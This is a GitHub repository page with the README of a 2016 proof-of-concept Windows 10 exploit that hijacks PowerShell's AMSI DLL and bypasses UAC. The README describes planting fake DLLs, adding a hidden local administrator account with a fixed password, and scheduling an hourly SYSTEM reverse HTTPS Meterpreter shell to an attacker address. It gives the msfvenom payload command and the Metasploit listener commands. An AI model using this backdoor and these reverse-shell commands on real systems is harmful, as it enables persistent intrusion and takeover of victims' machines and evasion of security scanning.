Join GitHub today
GitHub is home to over 40 million developers working together to host and review code, manage projects, and build software together.Sign up
No description, website, or topics provided.
|Type||Name||Latest commit message||Commit time|
|Failed to load latest commit information.|
_______ .__ ____ __.__.__ .__ ______ \ _ \ _____| |__ | |/ _|__| | | | ___________ \____ \/ /_\ \ / ___/ | \| < | | | | | _/ __ \_ __ \ | |_> > \_/ \\___ \| Y \ | \| | |_| |_\ ___/| | \/ | __/ \_____ /____ >___| /____|__ \__|____/____/\___ >__| |__| \/ \/ \/ \/ \/ By Cn33liz - 2016 Windows 10 PowerShell5 - Amsi/UAC Bypass/Backdoor/Exploit using DLL Hijacking Proof of Concept exploit to bypass Microsoft latest AntiMalware Scan Interface technology within PowerShell5 on Windows 10. With this exploit/patch applied, you can take control over powershells program flow by using DLL Hijacking and UAC Bypasstechniques. Every time powershell is started, a local admin named BadAss with password FacePalm01 will be added to the system (when run by an non elevated administrator account) and a reverse (SYSTEM) https meterpreter session (default 192.168.1.120) will be started every hour using a scheduled task. Current status: * Reported to MSRC on 28-03-2016 * From Microsoft perspective AMSI/AntiVirus isn't a traditional security boundary. Requirements: * A Windows 10 Box with latest security patches applied. * Default UAC settings. * Local administrator privileges to apply the patch (no need for elevation because Exploit uses UAC bypass to patch Amsi/Powershell). * A remote https reversed meterpreter listener. * A p0sh Fanboy that uses powershell on his system ;) This Exploit contains 5 components (and 1 python script): p0shKiller.exe - The main tool to apply the Patch (only needed once). UacBypass.dll - Will be injected into explorer.exe process and uses IFileOperation (COM Interface) to copy needed DLL's (only needed once). Amsi.dll - This fake DLL is copied into: C:\Windows\System32\WindowsPowerShell\v1.0, and is the main vulnerable component. ntwdblib.dll - Fake ntwdblib.dll copied into C:\Windows\System32, which is used by cliconfg.exe (elevated process) to bypass UAC. MPAmsiRun.exe - Xor'ed Meterpreter Shellcode payload that is copied into C:\Windows\System32 and called by Amsi.dll. XORMeter.py - Python Script to generate your own Meterpreter Payload (MPAmsiRun.exe) By @vvalien1 The following shellcode is used as payload and compiled within the code: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.120 LPORT=443 EXITFUNC=thread -f hex > Shellcode.txt Setup your remote msf listener: use exploit/multi/handler set payload windows/x64/meterpreter/reverse_https set LHOST 0.0.0.0 set LPORT 443 set AutoRunScript post/windows/manage/priv_migrate exploit -j * Parts of this code has been borrowed from: https://github.com/hjc4869/UacBypass